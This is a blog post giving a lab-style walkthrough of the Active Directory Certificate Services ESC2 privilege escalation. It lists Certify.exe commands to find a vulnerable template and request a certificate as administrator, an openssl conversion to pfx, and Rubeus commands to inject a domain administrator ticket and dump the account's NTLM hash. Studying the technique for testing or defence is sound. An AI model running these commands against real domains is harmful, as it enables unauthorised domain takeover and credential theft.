首页 > 系统相关 >Windows ESC2 escalate privilege

Windows ESC2 escalate privilege

时间:2023-12-29 10:44:24浏览次数:28  
标签:exe certificate Windows CA escalate cert ESC2 template

BRIEF

ADCS(Active Directory certificate service).There are a lot enterpirse CA set up to issue certificates using certificate template definitions,which are a collection of registration policies and predefined certificate settings,and contain information such as how long is this certificate valid?What is the purpose of the certificate? How is the theme specified?Who can apply for a certificate? and countless other  settings.Certificate template have a specific set of settings that make them extremely vulnerable.

ESC2 theory

The second abuse scenario is a variant of ESC1 where certificates can be used for Any Purpose when the certificate template specifies Any Purpose EKU or no EKU at all.Using a subordinate CA certificate(a CA one level below the corresponding CA),an attacker can specify any EKUs or fileds in the new certificate.ESC2 utilization conditions:

ESC2 needs to meet the following requirements for successful us (most importantly ,the first 2)

1.you need to have permission to register the certificate

2.No EKU or any Purpose EKU is defined in the certificate template.

ESC2 Loophole recurrence

CETFIFY / RUBUES

The process of exploting the vulnerability is the same as for ESC1.

A tool Certify is used to check the certificate configuration.

Upload the Certify to the box 

Certify.exe find /vulnerable /currentuser

The next is apply for a certificate for the domain administrator

Certify.exe request /ca:CA.test.com\test-CA-CA /template:ESC2 /altname:administrator

Accquire certificate successfully

Copy the cert.pem from -------BEGIN RSA PRIVATE KEY----- to -----END CERTIFICATE----- into a file and convert it to pfx file.

On my machine

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

We can enter space when prompted:

Upload the cert.pfx file and rubeus.exe to box and apply for the TGT.

RUBEUS.EXE

Rubeus tries to load the returned ticket directly into the current session, so in theory, once I run this I could just enter administrator’s folders and get the flag.

There are a lot usages of Rubeus.exe.

1.Specify the dc and inject the ticket in control box.

Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /dc:xxxxx /ptt

2.dump the credential information about account.

Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /getcredentials /nowrap /show

The last line is NTLM hash 

 

 

标签:exe,certificate,Windows,CA,escalate,cert,ESC2,template
From: https://www.cnblogs.com/lisenMiller/p/17934227.html

相关文章

  • Luminar Neo 1.17.0 (macOS, Windows) - 创新 AI 图像编辑器
    LuminarNeo1.17.0(macOS,Windows)-创新AI图像编辑器作者主页:sysin.org你想象中的照片LuminarNeo让您能够表达所见之美什么是LuminarNeo?您是否曾经想通过图像获得更多成就?LuminarNeo是一款创新的图像编辑器,由未来的AI技术提供支持,可简化复杂的编辑程序并使创作者能......
  • Adobe Creative Cloud 2024 (macOS, Windows) 下载汇总 - 创意应用程序
    AdobeCreativeCloud2024(macOS,Windows)-创意应用程序Acrobat、AfterEffects、Animate、Audition、Bridge、CharacterAnimator、Dimension、Dreamweaver、Illustrator、InCopy、InDesign、LightroomClassic、MediaEncoder、Photoshop、PremierePro、AdobeXD作者主页:sy......
  • Adobe Lightroom Classic v13.1 (macOS, Windows) - 桌面照片编辑器
    AdobeLightroomClassicv13.1(macOS,Windows)-桌面照片编辑器Acrobat、AfterEffects、Animate、Audition、Bridge、CharacterAnimator、Dimension、Dreamweaver、Illustrator、InCopy、InDesign、LightroomClassic、MediaEncoder、Photoshop、PremierePro、AdobeXD作者......
  • Adobe Illustrator 2024 v28.1 (macOS, Windows) - 矢量绘图
    AdobeIllustrator2024v28.1(macOS,Windows)-矢量绘图Acrobat、AfterEffects、Animate、Audition、Bridge、CharacterAnimator、Dimension、Dreamweaver、Illustrator、InCopy、InDesign、LightroomClassic、MediaEncoder、Photoshop、PremierePro、AdobeXD作者主页:sys......
  • Adobe Photoshop 2024 v25.3 (macOS, Windows) - 照片和设计软件
    AdobePhotoshop2024v25.3(macOS,Windows)-照片和设计软件Acrobat、AfterEffects、Animate、Audition、Bridge、CharacterAnimator、Dimension、Dreamweaver、Illustrator、InCopy、InDesign、LightroomClassic、MediaEncoder、Photoshop、PremierePro、AdobeXD请访问......
  • windows 创建自定义url协议 通过浏览器打开cmd
    打开regedit注册表编辑器找到HKEY_CLASSES_ROOT新建如下目录 ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------......
  • 在Windows环境下安装xmind
    在Windows环境下安装xmindxmind是什么xmind是一款思维导图软件,应用EclipseRCP软件架构,打造易用、高效的可视化思维软件,强调软件的可扩展、跨平台、性能,致力于帮助用户提高生产力。xmind采用Java语言开发,具备跨平台运行的性质、且基于EclipseRCP体系架构,可支持插件,插件通过编......
  • Java服务jar包在Windows系统调用bat脚本启动,停止,重启jar包
    创建一个以bat后缀结束的文件,写入一下代码:1.启动jar包脚本:在Windows系统上面创建start.bat启动jar包脚本编辑以下内容:@echooff%1mshtavbscript:CreateObject("WScript.Shell").Run("%~s0::",0,FALSE)(window.close)&&exitjava-Xms256m-Xmx512m -Dfile.encoding=utf-......
  • Windows 上常用的Command命令行操作
    打开命令行窗口的方法注意:DOS命令不区分大小写.ProgramFiles,在dos命令中完全可以用"progra~1"代替,加上英文引号是因为名称的中间有空格(即多于一个词)。操作 结果c:\Users\DELL>cd\programfiles c:\ProgramFiles>C:\Users\DELL>cd\"progra~1" C:\PROGRA~1>c:\Users\DELL>cdc......
  • Windows系统中Run对话框输入URL和IP地址的区别
    Windows系统中Run对话框输入URL和IP地址的区别在Windows系统中,我们可以通过Run对话框快速执行一些命令或者打开一些应用程序。当我们在Run对话框中输入URL(比如//www.baidu.com)和IP地址(比如\192.168.3.194)时,两者有一些区别。本篇博客将详细探讨这些区别。1.URL和IP地址的基本概......